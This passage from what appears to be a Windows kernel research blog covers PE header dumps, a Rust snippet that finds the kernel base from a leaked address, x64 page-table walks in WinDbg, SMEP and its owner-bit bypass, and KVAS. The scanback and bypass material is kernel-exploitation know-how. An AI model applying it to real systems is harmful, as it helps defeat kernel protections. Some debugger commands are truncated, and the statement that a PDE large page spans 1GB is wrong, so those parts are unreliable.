         Execute Read

SECTION HEADER #10
INITKDBG name
   195BA virtual size
  9F6000 virtual address
   19600 size of raw data
  946800 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
68000020 flags
         Code
         Not Paged
         (no align specified)
         Execute Read

SECTION HEADER #11
TRACESUP name
    175B virtual size
  A10000 virtual address
    1800 size of raw data
  95FE00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
68000020 flags
         Code
         Not Paged
         (no align specified)
         Execute Read

SECTION HEADER #12
KVASCODE name
    23DE virtual size
  A12000 virtual address
    2400 size of raw data
  961600 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
68000020 flags
         Code
         Not Paged
         (no align specified)
         Execute Read

SECTION HEADER #13
  RETPOL name
     740 virtual size
  A15000 virtual address
     800 size of raw data
  963A00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
68000020 flags
         Code
         Not Paged
         (no align specified)
         Execute Read

SECTION HEADER #14
  MINIEX name
    25AE virtual size
  A16000 virtual address
    2600 size of raw data
  964200 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
62000020 flags
         Code
         Discardable
         (no align specified)
         Execute Read

SECTION HEADER #15
    INIT name
   8AA98 virtual size
  A19000 virtual address
   8AC00 size of raw data
  966800 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
62000020 flags
         Code
         Discardable
         (no align specified)
         Execute Read

SECTION HEADER #16
    Pad2 name
  15C000 virtual size
  AA4000 virtual address
       0 size of raw data
       0 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
62000080 flags
         Uninitialized Data
         Discardable
         (no align specified)
         Execute Read

SECTION HEADER #17
   .data name
   FA018 virtual size
  C00000 virtual address
   13000 size of raw data
  9F1400 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C8000040 flags
         Initialized Data
         Not Paged
         (no align specified)
         Read Write

SECTION HEADER #18
ALMOSTRO name
   272E0 virtual size
  CFB000 virtual address
    1400 size of raw data
  A04400 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C8000040 flags
         Initialized Data
         Not Paged
         (no align specified)
         Read Write

SECTION HEADER #19
CACHEALI name
    92C0 virtual size
  D23000 virtual address
     200 size of raw data
  A05800 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C8000040 flags
         Initialized Data
         Not Paged
         (no align specified)
         Read Write

SECTION HEADER #1A
PAGEDATA name
   12150 virtual size
  D2D000 virtual address
    1800 size of raw data
  A05A00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C0000040 flags
         Initialized Data
         (no align specified)
         Read Write

SECTION HEADER #1B
PAGEVRFD name
   15D00 virtual size
  D40000 virtual address
    8000 size of raw data
  A07200 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C0000040 flags
         Initialized Data
         (no align specified)
         Read Write

SECTION HEADER #1C
INITDATA name
   17C44 virtual size
  D56000 virtual address
     800 size of raw data
  A0F200 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C2000020 flags
         Code
         Discardable
         (no align specified)
         Read Write

SECTION HEADER #1D
    Pad3 name
   92000 virtual size
  D6E000 virtual address
       0 size of raw data
       0 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C2000080 flags
         Uninitialized Data
         Discardable
         (no align specified)
         Read Write

SECTION HEADER #1E
   CFGRO name
    1CC8 virtual size
  E00000 virtual address
    1E00 size of raw data
  A0FA00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C8000040 flags
         Initialized Data
         Not Paged
         (no align specified)
         Read Write

SECTION HEADER #1F
    Pad4 name
  1FE000 virtual size
  E02000 virtual address
       0 size of raw data
       0 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
CA000080 flags
         Uninitialized Data
         Discardable
         Not Paged
         (no align specified)
         Read Write

SECTION HEADER #20
   .rsrc name
   3B23C virtual size
 1000000 virtual address
   3B400 size of raw data
  A11800 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
42000040 flags
         Initialized Data
         Discardable
         (no align specified)
         Read Only

SECTION HEADER #21
  .reloc name
    9964 virtual size
 103C000 virtual address
    9A00 size of raw data
  A4CC00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
42000040 flags
         Initialized Data
         Discardable
         (no align specified)
         Read Only

... many more headers

0xfffff806`6e3fc000
fffff806`6e3fc000  00905a4d 00000003 00000004 0000ffff  MZ..............
fffff806`6e3fc010  000000b8 00000000 00000040 00000000  ........@.......
fffff806`6e3fc020  00000000 00000000 00000000 00000000  ................
fffff806`6e3fc030  00000000 00000000 00000000 000000e8  ................
fffff806`6e3fc040  0eba1f0e cd09b400 4c01b821 685421cd  ........!..L.!Th
fffff806`6e3fc050  70207369 72676f72 63206d61 6f6e6e61  is program canno
fffff806`6e3fc060  65622074 6e757220 206e6920 20534f44  t be run in DOS 
fffff806`6e3fc070  65646f6d 0a0d0d2e 00000024 00000000  mode....$.......

File Type: DLL
FILE HEADER VALUES
     14C machine (i386)
       6 number of sections
2AB009D1 time date stamp Thu Sep 10 22:52:01 1992

       0 file pointer to symbol table
       0 number of symbols
      E0 size of optional header
    2102 characteristics
            Executable
            32 bit word machine
            DLL

OPTIONAL HEADER VALUES
     10B magic #
   14.20 linker version
   1A800 size of code
    4600 size of initialized data
       0 size of uninitialized data
    7370 address of entry point
    1000 base of code
         ----- new -----
0000000076570000 image base
    1000 section alignment
     200 file alignment
       3 subsystem (Windows CUI)
   10.00 operating system version
   10.00 image version
   10.00 subsystem version
   23000 size of image
     400 size of headers
   233EC checksum
0000000000040000 size of stack reserve
0000000000001000 size of stack commit
0000000000100000 size of heap reserve
0000000000001000 size of heap commit
    4540  DLL characteristics
            Dynamic base
            NX compatible
            No structured exception handler
            Guard
   11D80 [    99D3] address [size] of Export Directory
   1D364 [     154] address [size] of Import Directory
   20000 [     3D8] address [size] of Resource Directory
       0 [       0] address [size] of Exception Directory
   1EE00 [    2690] address [size] of Security Directory
   21000 [    1304] address [size] of Base Relocation Directory
    28E0 [      54] address [size] of Debug Directory
       0 [       0] address [size] of Description Directory
       0 [       0] address [size] of Special Directory
       0 [       0] address [size] of Thread Storage Directory
    1000 [      AC] address [size] of Load Configuration Directory
       0 [       0] address [size] of Bound Import Directory
   1D000 [     360] address [size] of Import Address Table Directory
    E0AC [     320] address [size] of Delay Import Directory
       0 [       0] address [size] of COR20 Header Directory
       0 [       0] address [size] of Reserved Directory


SECTION HEADER #1
   .text name
   1A753 virtual size
    1000 virtual address
   1A800 size of raw data
     400 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
60000020 flags
         Code
         (no align specified)
         Execute Read


Debug Directories(3)
    Type       Size     Address  Pointer
    (   96)   60f01       d640f    a340f
    (1342988301)    300b       c1d01    b741d
    (4028183069)c015e017       a2619  10f0114

SECTION HEADER #2
   .data name
     4F4 virtual size
   1C000 virtual address
     200 size of raw data
   1AC00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C0000040 flags
         Initialized Data
         (no align specified)
         Read Write

SECTION HEADER #3
  .idata name
    1D9A virtual size
   1D000 virtual address
    1E00 size of raw data
   1AE00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
40000040 flags
         Initialized Data
         (no align specified)
         Read Only

SECTION HEADER #4
  .didat name
     8C4 virtual size
   1F000 virtual address
     A00 size of raw data
   1CC00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C0000040 flags
         Initialized Data
         (no align specified)
         Read Write

SECTION HEADER #5
   .rsrc name
     3D8 virtual size
   20000 virtual address
     400 size of raw data
   1D600 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
40000040 flags
         Initialized Data
         (no align specified)
         Read Only

SECTION HEADER #6
  .reloc name
    1304 virtual size
   21000 virtual address
    1400 size of raw data
   1DA00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
42000040 flags
         Initialized Data
         Discardable
         (no align specified)
         Read Only

The first one is the header dump for the kernel. Note the valid debug directory. If you want the full output you can get that here.

Some of these headers are less valid than they appear. The last header tells us that the code section starts at an offset of 0x1000 bytes, as is common for PE files. Investigating that memory location yields not code, but ASCII data.

0: kd> db fffff806`6e3f0000+1000
fffff806`6e3f1000  29 0a 2d 2d 0a 0a 50 6f-73 74 20 61 20 6d 65 73  ).--..Post a mes
fffff806`6e3f1010  73 61 67 65 20 74 6f 20-63 6f 6d 70 6c 65 74 69  sage to completi
fffff806`6e3f1020  6f 6e 20 70 6f 72 74 2e-00 00 00 00 00 00 00 00  on port.........
fffff806`6e3f1030  52 65 61 64 46 69 6c 65-28 24 73 65 6c 66 2c 20  ReadFile($self, 
fffff806`6e3f1040  68 61 6e 64 6c 65 2c 20-73 69 7a 65 2c 20 2f 29  handle, size, /)
fffff806`6e3f1050  0a 2d 2d 0a 0a 53 74 61-72 74 20 6f 76 65 72 6c  .--..Start overl
fffff806`6e3f1060  61 70 70 65 64 20 72 65-61 64 2e 00 00 00 00 00  apped read......
fffff806`6e3f1070  4f 76 65 72 6c 61 70 70-65 64 28 65 76 65 6e 74  Overlapped(event

It is possible that these DLLs/drivers were really here at some point but they are gone now and may have been replaced by other data. Regardless, what is left will mess up our page-at-a-time scanback technique to find the base of the kernel.

hal.dll

Another interesting change in the kernel in 20H1+ is that the Hardware Abstraction Layer (HAL) has moved into the kernel image itself and no longer lives inside of hal.dll. If you open up hal.dll in a disassembler, you will notice that it actually does not even have a .text section. It is just a forwarding DLL that forwards exports into the kernel. The forwarding is done to not break backwards compatibility with drivers and components that expect to import HAL functionality from hal.dll and not ntoskrnl.exe.

hal.dll
hal.dll has no code! It does still have the Hal* exports.

Fixing Scanback

Since the new version of the kernel has the .text section starting at 0x200000 we can adjust our scanback to the following algorithm:

const KUSER_SHARED_DATA: usize = 0xFFFFF78000000000;
const KUSER_NT_MAJOR_VERSION_OFFSET: usize = 0x26C;
const KUSER_NT_BUILD_NUMBER_OFFSET: usize = 0x260;
let major_version: *const u32 = (KUSER_SHARED_DATA + KUSER_NT_MAJOR_VERSION_OFFSET) as _;
let build_number: *const u32 = (KUSER_SHARED_DATA + KUSER_NT_BUILD_NUMBER_OFFSET) as _;
let step = if unsafe { *major_version >= 10 && *build_number > 19000 } {
    0x200000
} else {
    0x1000
}
let mut cursor = (leaked_addr as usize & !(step-1)) as *const u16;
unsafe {
    while *cursor != 0x5a4d {
        cursor = cursor.sub(step);
    }
}
let kernel_base = cursor as usize;

Obviously, this code has to be version dependent so we can still use the KUSER_SHARED_DATA version detection method to decide which step amount to use. The algorithm is the same as before, but instead of rounding down to the nearest page and then scanning backward by page size, we use 0x200000. This technique actually also works on 19H1, since the kernel is mapped with large pages (yes entirely RWX in 19H1) and large pages happen to be 0x200000 bytes in size.

Another alternative is to parse each header and try to figure out which one is ntoskrnl.exe. I've tried two alternatives that work: checking the number of sections or looking up the PDB path via the DEBUG data directory.

If Microsoft decides to change the .text section offset or puts unmapped regions between sections this will need to be re-written.

Wrap Up

I hope that this post has been informative! I thought there was going to be more in the solutions section than literature review, but I think this ended up being a good round up of info regardless. It's been something I've wanted to post for a while but finally took the time to write it up properly.

Anyway, have a good day and remember to ask yourself... ~~did you set it to wumbo?~~

Using kd.exe from VSCode Remote

I wanted to do a small post here, just because the answer to this issue was sort of scattered on the internet. Bigger post coming soon on some kernel exploit technique stuff.

It turns out that when running kd.exe for command line kernel debugging from VSCode remote, symbol resolution breaks completely. Why? Looks like when running from a service symsrv.dll uses WINHTTP for making requests instead of WININET. You can replicate this behavior in a normal shell by setting $env:DBGHELP_WINHTTP=1 in a powershell window and then running kd.exe. For some reason, WINHTTP tries to always use a proxy server, so you have to tell it not to via the following key in the registry:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Symbol Server -> NoInternetProxy -> DWORD = 1

You should also set it in HKLM\SOFTWARE\WOW6432Node\Microsoft\Symbol Server too, in case you are using a 32-bit debugger.

This issue will happen with cdb.exe and kd.exe, so I hope this solution helps someone.

https://stackoverflow.com/questions/5095328/cannot-download-microsoft-symbols-when-running-cdb-in-a-windows-service
https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/configuring-the-registry

Windows 10 KVAS and Software SMEP

Kernel Virtual Address Shadow (KVAS) is the Windows implementation of Kernel Page Table Isolation (KPTI). It was introduced to mitigate the Meltdown vulnerability, which allowed an attacker that could execute code in user mode to leak out data from the kernel by abusing a side channel. While there are plenty of papers and blog posts on Meltdown and KVAS, there isn't much info on an interesting feature that KVAS enables: software SMEP. Unfortunately or fortunately, depending on your interest level in this post and Windows internals, understanding how software SMEP works requires knowledge of x86_64 paging, regular SMEP, and KVAS, so I'll be getting into those topics enough to give you an understanding of the underlying technology. Near the end I'll be running some experiments to show the internals of what I covered in the technical sections prior.

x64 Paging on Windows

First, I'm going to dive into a short introduction to x86_64 (4-level) paging, the structures involved, and WinDbg commands to interact with the page hierarchy, just so the experiments later on are more understandable; plus a lot of this information is almost never presented together, so I think collecting it in a here's what you need to know format is useful. If you want more info consult the Intel manuals or check out Connor McGarr's blog. Connor does a great job of explaining the basics, so you may want to read his post over before continuing here if you don't already have at least a vague understanding of multi-level paging.

[[more]]

_MMPTE_HARDWARE

The structure that represents a page table entry on x86_64 is nt!_MMPTE_HARDWARE. It is an 8 byte structure with a lot of information:

0: kd> dt -v nt!_MMPTE_HARDWARE
struct _MMPTE_HARDWARE, 18 elements, 0x8 bytes
   +0x000 Valid               : Bitfield Pos 0, 1 Bit
   +0x000 Dirty1              : Bitfield Pos 1, 1 Bit
   +0x000 Owner               : Bitfield Pos 2, 1 Bit
   +0x000 WriteThrough        : Bitfield Pos 3, 1 Bit
   +0x000 CacheDisable        : Bitfield Pos 4, 1 Bit
   +0x000 Accessed            : Bitfield Pos 5, 1 Bit
   +0x000 Dirty               : Bitfield Pos 6, 1 Bit
   +0x000 LargePage           : Bitfield Pos 7, 1 Bit
   +0x000 Global              : Bitfield Pos 8, 1 Bit
   +0x000 CopyOnWrite         : Bitfield Pos 9, 1 Bit
   +0x000 Unused              : Bitfield Pos 10, 1 Bit
   +0x000 Write               : Bitfield Pos 11, 1 Bit
   +0x000 PageFrameNumber     : Bitfield Pos 12, 36 Bits
   +0x000 ReservedForHardware : Bitfield Pos 48, 4 Bits
   +0x000 ReservedForSoftware : Bitfield Pos 52, 4 Bits
   +0x000 WsleAge             : Bitfield Pos 56, 4 Bits
   +0x000 WsleProtection      : Bitfield Pos 60, 3 Bits
   +0x000 NoExecute           : Bitfield Pos 63, 1 Bit

Some fields of particular importance:

  • Valid - this entry is valid. must be 1 to consider the data inside the rest of the structure valid.
  • Owner - 0 for kernel mode pages, 1 for user mode pages. corresponds to the KPROCESSOR_MODE enum in the DDK.
  • LargePage - noted here, discussed below!
  • Write - 0 if the page is read only, 1 if R/W
  • PageFrameNumber - the physical address of the base of the next level of paging. mask these bits out or pull them out and shift left by 12 (0xc) to get the address, shown in detail below. abbreviated PFN.
  • NoExecute - NX bit. code cannot be executed in these pages.

Each level of the page table hierarchy has an _MMPTE_HARDWARE entry. If a permission is set at a lower level, then the permission must be set at all higher levels as well in order for it to take effect. Conversely, if a permission is set at a higher level, it must also be set at all lower levels in order for it to have effect.

Let's look at an example in user mode on a system with KVAS disabled:

0: kd> !process 0 0 explorer.exe
PROCESS ffffc8064497b340
    SessionId: 1  Cid: 1038    Peb: 0090c000  ParentCid: 100c
    DirBase: bc33c000  ObjectTable: ffffa2827c3a1800  HandleCount: 1884.
    Image: explorer.exe
0: kd> .process /p /i ffffc8064497b340
You need to continue execution (press 'g' ) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff805`2e1fd0b0 cc              int     3
1: kd> .reload
Connected to Windows 10 19041 x64 target at (Sun Nov 15 19:51:29.691 2020 (UTC - 5:00)), ptr64 TRUE
Loading Kernel Symbols
...
1: kd> bp /p @$proc ntdll!NtCreateFile
1: kd> g
Breakpoint 0 hit
ntdll!NtCreateFile:
0033:00007ffc`3608c830 4c8bd1          mov     r10,rcx
1: kd> !pte kernel32
                                           VA 00007ffc35ee0000
PXE at FFFFE5F2F97CB7F8    PPE at FFFFE5F2F96FFF80    PDE at FFFFE5F2DFFF0D78    PTE at FFFFE5BFFE1AF700
contains 0A000000BBF48867  contains 0A000000BC34E867  contains 0A000000BC34F867  contains 8100000003806025
pfn bbf48     ---DA--UWEV  pfn bc34e     ---DA--UWEV  pfn bc34f     ---DA--UWEV  pfn 3806      ----A--UR-V

There are executable pages in kernel32, but the page containing the header should not be executable. This is reflected in the page hierarchy above, where the PXE, PPE, and PDE are all RWX, but the PTE indicates that the page is read only. The !pte command is detailed more in a few sections, so don't worry if the output is confusing at this moment.

Manually Walking the Page Tables

To appreciate tools like !pte let's look at an example of manually walking the page tables to resolve the physical address of data from it's virtual address. I'm going to be walking the page tables on a system that has KVAS disabled, to reduce complexity, but note there will be a slight twist in this example.
Let's look for nt!NtCreateFile. First, we can use the .formats command to get the binary representation of the address of nt!NtCreateFile. The CR3 register is also required here, since it holds the hardware address of the base of the page tables.

0: kd> .formats nt!NtCreateFile
Evaluate expression:
  Hex:     fffff805`2e3ff090
  Decimal: -8773842243440
  Octal:   1777777600245617770220
  Binary:  11111111 11111111 11111000 00000101 00101110 00111111 11110000 10010000
  Chars:   .....?..
  Time:    ***** Invalid FILETIME
  Float:   low 4.3642e-011 high -1.#QNAN
  Double:  -1.#QNAN
0: kd> r cr3
cr3=00000000001ad000

Since addresses must be canonical, bits 63-49 will all be the same. Then we have bits representing the index into each level of the page tables (9 bits at a time until the page offset):

  • Bits 47-39 = Page-Map Level 4 (PML4) entry (sometimes PXE)
  • Bits 38-30 = Page Directory Pointer Table (PDPT) entry (sometimes PPE)
  • Bits 29-21 = Page Directory Entry (PDE)
  • Bits 20-12 = Page Table Entry (PTE)
  • Bits 11-0 = Offset into physical page where the start of the data resides

Let's break down the .formats output into each index:

                            PML4 idx.   PDPT idx.   PDT idx.    PTE idx.     page idx.
Binary:  11111111 11111111 [11111000 0][0000101 00][101110 001][11111 11110][000 10010000]

Each level of the page hierarchy is just an array of 512 (0x200) _MMPTE_HARDWARE structures. To get the PML4 entry, index into the array starting at CR3 by the PML4 index found from the .formats command above. Remember the -p flag to dt or this will fail. Also, instead of prefixing binary with 0b, which would make too much sense, WinDbg prefixes binary with 0y.

0: kd> dt -p _MMPTE_HARDWARE @@C++(@cr3+@@(0y111110000)*sizeof(_MMPTE_HARDWARE))
nt!_MMPTE_HARDWARE
   +0x000 Valid            : 0y1
   +0x000 Dirty1           : 0y1
`  +0x000 Owner            : 0y0
   +0x000 WriteThrough     : 0y0
   +0x000 CacheDisable     : 0y0
   +0x000 Accessed         : 0y1
   +0x000 Dirty            : 0y1
   +0x000 LargePage        : 0y0
   +0x000 Global           : 0y0
   +0x000 CopyOnWrite      : 0y0
   +0x000 Unused           : 0y0
   +0x000 Write            : 0y0
   +0x000 PageFrameNumber  : 0y000000000000000000000100101100001001 (0x4b09)
   +0x000 ReservedForHardware : 0y0000
   +0x000 ReservedForSoftware : 0y0000
   +0x000 WsleAge          : 0y0000
   +0x000 WsleProtection   : 0y000
   +0x000 NoExecute        : 0y0

Let's also look at the entry with !dq:

0: kd> !dq @@C++(@cr3+@@(0y111110000)*sizeof(_MMPTE_HARDWARE)) L1
#  1adf80 00000000`04b09063

To get to the Page Directory Pointer Table (PDPT) entry from here we need to take the PageFrameNumber, shift it back into its original position in _MMPTE_HARDWARE via a shift left by 12 (0xc) bits and then take the PDPT index. You can also just mask the QWORD that represents the entry (ex. 0x0000000004b09063 & 0xfffffffff000).

0: kd> dt -p _MMPTE_HARDWARE @@C++((0x4b09

Now for the PDE and PTE levels, which are calculated the same way, using the next level's PFN.

0: kd> dt -p _MMPTE_HARDWARE @@C++((0x4b0a dt -p _MMPTE_HARDWARE @@C++((0x2c00

What happened here? The PTE does not seem valid. Pay close attention to the flags in the PDE.

   +0x000 LargePage        : 0y1

This means that the page is part of a large page and the attributes from the PDE apply to every page that it would represent. Large pages on x86 represent a whole PDE worth of pages. The math works out to 1GB of pages represented by a large page:

0: kd> ? 0n512 * 0n512 * 0x1000 //  ? 0n1024 * 0n1024 * 0n1024 // 

There are also huge pages that work the same way, except at the PDPT level instead.

To resolve the starting physical address in this situation, you just need to use the remaining bits (20-0) as an offset into the large page PFN. The diagram above (from the .formats command) becomes the following:

                            PML4 idx.   PDPT idx.   PDT idx.    page idx.
Binary:  11111111 11111111 [11111000 0][0000101 00][101110 001][11111 11110000 10010000]

Now we just need to do the math:

0: kd> ? (0x2c00<<c)+0y111111111000010010000
Evaluate expression: 48230544 = 00000000`02dff090

Validate by dumping out what is at the virtual address for nt!NtCreateFile and what is at the physical address we calculated above:

0: kd> !dq (0x2c00<<c)+0y111111111000010010000
# 2dff090 33000000`88ec8148 44c77824`448948c0
# 2dff0a0 44890000`00207024 89602444`89486824
# 2dff0b0 00e02484`8b582444 8b485024`44890000
# 2dff0c0 89480000`00d82484 00d02484`8b482444
# 2dff0d0 848b4024`44890000 24448900`0000c824
# 2dff0e0 000000c0`24848b38 b824848b`30244489
# 2dff0f0 48282444`89000000 48000000`b024848b
# 2dff100 000017e8`20244489 00000088`c4814800
0: kd> dq nt!NtCreateFile
fffff805`2e3ff090  33000000`88ec8148 44c77824`448948c0
fffff805`2e3ff0a0  44890000`00207024 89602444`89486824
fffff805`2e3ff0b0  00e02484`8b582444 8b485024`44890000
fffff805`2e3ff0c0  89480000`00d82484 00d02484`8b482444
fffff805`2e3ff0d0  848b4024`44890000 24448900`0000c824
fffff805`2e3ff0e0  000000c0`24848b38 b824848b`30244489
fffff805`2e3ff0f0  48282444`89000000 48000000`b024848b
fffff805`2e3ff100  000017e8`20244489 00000088`c4814800

There you have it, validation that the process we followed was correct. If the PDE was not a large page then the PTE would have been valid and bits 11-0 would have been an index into the PFN of the PTE.

Windbg Commands

Of course it is very annoying to do that whole process manually, so WinDbg provides two ways to accomplish what we just looked at. The !pte command will take what is in CR3 and walk the page tables with the virtual address you give it. To match up with the same example as above:

0: kd> !pte nt!NtCreateFile
                                           VA fffff8052e3ff090
PXE at FFFFE5F2F97CBF80    PPE at FFFFE5F2F97F00A0    PDE at FFFFE5F2FE014B88    PTE at FFFFE5FC02971FF8
contains 0000000004B09063  contains 0000000004B0A063  contains 0A00000002C001A1  contains 0000000000000000
pfn 4b09      ---DA--KWEV  pfn 4b0a      ---DA--KWEV  pfn 2c00      -GL-A--KREV  LARGE PAGE pfn 2dff 

This shows the virtual addresses of each level in the hierarchy as well as a breakdown of what each _MMPTE_HARDWARE structure contains. There is also the !vtop command, which will let you specify what page table base (hardware address) to use as the base of the page tables (PML4). This will become useful to us in investigating KVAS, because we want to be able to look at each page table without having to change CR3. Again mirroring the example above to show what data it provides:

0: kd> r cr3
cr3=00000000001ad000
0: kd> ? nt!NtCreateFile
Evaluate expression: -8773842243440 = fffff805`2e3ff090
0: kd> !vtop 1ad000 fffff8052e3ff090
Amd64VtoP: Virt fffff8052e3ff090, pagedir 00000000001ad000
Amd64VtoP: PML4E 00000000001adf80
Amd64VtoP: PDPE 0000000004b090a0
Amd64VtoP: PDE 0000000004b0ab88
Amd64VtoP: Large page mapped phys 0000000002dff090
Virtual address fffff8052e3ff090 translates to physical address 2dff090.

You can examine the addresses via dump commands prefixed with ! (ex. !dq, !dd, !dc) and by using dump type (dt) with the -p flag for physical addresses.

Note that !vtop doesn't play as nice with symbols or WinDbg numbers, so make sure things are in the right format before passing them in. For example, the following commands are invalid to !vtop:

0: kd> !vtop 1ad000 nt!NtCreateFile
Amd64VtoP: Virt 0000000000000000, pagedir 00000000001ad000
Amd64VtoP: PML4E 00000000001ad000
Amd64VtoP: PDPE 0000000100ee1000
Amd64VtoP: zero PDPE
Virtual address 0 translation fails, error 0xD0000147.
0: kd> !vtop @cr3 fffff8052e3ff090
usage: vtop PFNOfPDE VA
0: kd> !vtop 1ad000 fffff805`2e3ff090
Amd64VtoP: Virt 00000000fffff805, pagedir 00000000001ad000
Amd64VtoP: PML4E 00000000001ad000
Amd64VtoP: PDPE 0000000100ee1018
Amd64VtoP: zero PDPE
Virtual address fffff805 translation fails, error 0xD0000147.

We will be using these commands to walk the page tables for the rest of the post, but it is good to know how to manually walk them.

SMEP

SMEP stands for Supervisor Mode Execution Prevention (or sometimes Protection). The idea here is code in lower privileged memory pages should never be trusted (i.e. executed) by a higher privileged mode. For standard SMEP this means executable pages allocated in user mode should not be executed while in kernel mode. It is enforced by the CPU itself and requires explicit support. AMD and Intel processors started rolling out support for this feature in around 2012 for Intel (Ivy Bridge) and 2014 for AMD (Family 17h, Family 15h model >60h). SMEP is enabled on a supported processor when bit 20 of the CR4 register is set. This is consistent between AMD and Intel processors. Do you remember the owner bit (U/K) from the _MMPTE_HARDWARE structure? This is the bit that says whether a page belongs to user mode or kernel mode and is how SMEP is enforced. When in kernel mode (supervisor mode), if the owner bit is 1, then the page is owned by user mode and code should not be executed inside of it. This begs the question: well, what if we can flip that bit? Can we execute those pages? The answer there is yes absolutely, until KVAS was introduced. My favorite presentation on this topic is from EKOParty 2015 by Enrique Nissim and Nicolas Economou called Windows SMEP Bypass U=S. We will examine why KVAS mitigates this attack soon.

Another technology that implements the same sort of trust boundary that SMEP enforces is called Mode-Based Execution Control (MBEC, or just MBE Control), which is enforced between a hypervisor and its guest(s). I'm not going to deep dive into that here, but just know that the high level concept of SMEP applies where the supervisor (hypervisor) does not trust the less privileged pages in user mode (guest) and thus will not execute in them from supervisor mode. Another interesting note about hypervisors: it's also possible to implement software SMEP via Extended Page Table (EPT) permissions. Here's a post from 2014 detailing how this might be done.

There is also Supervisor Mode Access Prevention (SMAP), which is a newer control that prevents accesses to user mode while in kernel mode, unless certain conditions are met. It can be turned on via bit 21 of CR4 on supported processors. This is not entirely relevant to this post, so I'll skip the details on this one for now as well.

KVAS Implementation in Brief

To avoid information disclosure from a successful exploit of the Meltdown vulnerability, separate page tables are kept for user mode and kernel mode for each process. The general term for this technology is Kernel Page Table Isolation (KPTI). Kernel Virtual Address Shadow (KVAS) is the Windows specific implementation of KPTI. The user mode version of the page tables does not even contain the mappings for (almost all) kernel addresses, which the kernel mode version contains mappings for both user and kernel address spaces. Some pages exist in both sets, like KUSER_SHARED_DATA and the system call handler, which actually replaces CR3 on entry and exit into/from the handler, as well as other kernel entry/exit points. We will be looking specifically at the system call handler for this example.

Check out the Microsoft blog post describing the implementation. Fortinet also has a great post on the internals of how KVAS is initialized in the kernel.

Your first thought with this implementation may be: "that sounds very memory expensive!". The overhead of having two sets of paging structures (which occupy some memory) per process is definitely nonzero. However, one optimization that exists relies on the fact that Microsoft does not consider the boundary between an administrator account and the kernel to be a security boundary. Processes that execute in an elevated context do not use KVAS at all! From Microsoft

Because these applications are fully trusted by the operating system, and already have (or could obtain) the capability to load drivers that could naturally access kernel memory, KVA shadowing is not required for fully-privileged applications.

This includes applications that are run by users in the BUILTIN\Administrators group and "processes that execute as a fully-elevated administrator account". Remember: this is an information disclosure concern, so if that information can already be accessed, disclosing it is not a concern. Low privileged users should not be able to leak kernel memory, so this mitigation will be in full effect for those users.


To begin to understand the implementation of KVAS in the Windows kernel, we can look at important fields in the nt!_KPRCB and nt!_KPROCESS structures:

0: kd> dt _KPROCESS DirectoryTableBase UserDirectoryTableBase AddressPolicy
ntdll!_KPROCESS
   +0x028 DirectoryTableBase     : Uint8B
   +0x388 UserDirectoryTableBase : Uint8B
   +0x390 AddressPolicy          : UChar
0: kd> dt nt!_KPRCB KernelDirectoryTableBase RspBaseShadow UserRspShadow ShadowFlags
   +0x8e80 KernelDirectoryTableBase : Uint8B
   +0x8e88 RspBaseShadow            : Uint8B
   +0x8e90 UserRspShadow            : Uint8B
   +0x8e98 ShadowFlags              : Uint4B

